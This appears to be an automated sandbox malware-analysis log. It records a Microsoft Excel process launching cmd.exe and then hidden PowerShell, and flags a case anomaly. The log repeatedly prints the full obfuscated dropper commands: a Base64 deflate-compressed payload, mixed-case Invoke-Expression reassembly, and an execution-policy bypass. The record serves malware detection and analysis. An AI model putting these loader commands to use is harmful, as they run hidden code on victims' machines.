Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
